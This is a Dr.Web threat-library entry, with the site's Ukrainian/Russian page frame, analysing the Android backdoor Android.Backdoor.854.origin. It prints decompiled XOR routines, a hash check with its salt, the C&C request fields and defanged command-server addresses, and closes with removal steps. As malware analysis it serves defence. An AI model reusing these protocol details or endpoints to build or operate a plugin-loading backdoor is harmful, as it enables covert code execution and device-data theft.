Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Android.Backdoor.854.origin

Добавлен в вирусную базу Dr.Web: 2022-07-22

Описание добавлено:

  • SHA1: c747a3a901f3076c504dc513bfcf64e8d29600ac (PrivteProvide.jar)

Description

Android.Backdoor.854.origin is a trojan application for Android-powered devices. It is a .DEX file placed into a .JAR archive. This archive is copied into the targeted apps’ directories by other trojans, particularly Android.BackDoor.3104. Android.Backdoor.854.origin’s main function is to download and launch additional malicious modules in the context of the targeted programs.

Operating routine

The com.androidx.v13.PrivteProvide.getInstance(String) entry point is used to start the trojan. When launched, at short time intervals it tries to obtain an instance of the android.app.Application class until it succeeds.

Android.Backdoor.854.origin creates the following subdirectories in the directories containing the files of the targeted apps:

  • .cache/pt—encrypted plugin files are downloaded into this directory;
  • .cache/pn—decrypted plugins are saved into this directory;
  • .cache/pd—in this directory, the optimized versions of plugins are saved. They are created by the operating system after the original versions are loaded through the DexClassLoader class.

Next, the trojan launches the downloaded plugins from the pn directory. The plugins are received upon connecting to one of the C&C servers.

The connection with the C&C server

Android.Backdoor.854.origin sends a request to one of the assigned C&C servers, connecting to them in order, starting with the first one. If it is unable to establish a connection with the first server within 24 hours, the trojan proceeds to the next one. Information about the last successful connection is stored in the configuration file sp_brois_settings in the successTime variable.

The list of C&C server URLs is as follows:

  • hxxp[:]//api[.]genetence[.]com:8300/pl2
  • hxxp[:]//api.[]matriature[.]com:8300/pl2
  • hxxp[:]//api[.]miretic[.]com:8300/pl2
  • hxxp[:]//api[.]sensfaction[.]com:8300/pl2
  • hxxp[:]//45[.]33.61[.]62:8300/pl2

The first request is executed 2 minutes after the thread is launched, and the request is repeated in an infinite loop cycle with an interval of 60 minutes. At the beginning, the first URL from the list is used. If the connection attempt fails within 24 hours, the trojan proceeds to the next URL.

The following parameters are used in the request:

Request parameter Description
a_l Android SDK version
a_i android_id—the unique device ID
a_v Application version name
a_c Application version code
model Device model
brand Device brand
ver A v3 string
pack Package name
imsi IMSI
imei IMEI
res Screen resolution
sys If the target application is a system app (if yes, the 1 value is sent; if no, the 0 value is sent)
fr A string sent when the trojan starts
ctm Current time
pft The time elapsed since the start of the trojan module
sn The md5 hash from the concatenation of the values of the a_l + a_i + a_v + a_c + "oignuowwg" + ctm parameters

The data sent to and received from the C&C server is encrypted with XOR:


public static byte[] xor(byte[] data) {
    int i;
    for(i = 0; i < data.length; ++i) {
       data[i] = (byte)(data[i] ^ 0x24D3);
    }
    return data;
}

If the server returns a status code with the value 200, the response from it must contain JSON and a particular hash in order for the trojan to execute the command to download and launch plugins:


JSONObject json = new JSONObject(response_body);
String s = json.getString("s");
if(Hash.md5(json.getString("u") + "&zhanghui18888").equals(s)) {
    .... //do work
}

The JSON that the C&C server sends back contains a plugin array where for each plugin the plugin_file, plugin_url, and plugin_size fields are indicated.

After receiving the parameters, the trojan deletes from the /.cache/pn directory the preexisting plugins, which are missing in the command. Next, the plugins specified in the command and which are no longer present on the device, are downloaded into the /.cache/pt catalog. The plugins are encrypted with XOR:


private static byte[] xor(byte[] data) {
    byte[] out = new byte[data.length];
    int i;
    for(i = 0; i < data.length; ++i) {
        out[i] = (byte)(data[i] ^ 0xB9);
    }
    return out;
}

The trojan decrypts them and places them into the /.cache/pn directory.

After that, all the plugins that have been copied into the /.cache/pn catalog are loaded into the memory and launched in the context of the attacked applications. Depending on their functionality, such plugins can perform various malicious actions.

If the C&C server returns a status code with the value 206, Android.Backdoor.854.origin writes the variables "successFlag" = 1 and "successTime" = System.currentTimeMillis() to the sp_brois_settings configuration file, which means that the request to the C&C server was successful. The trojan performs a similar action when it receives the code 200. When the code 206 is received, the trojan does not download the plugins.

Indicators of compromise

More details on Android.BackDoor.3104

News about the trojan

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке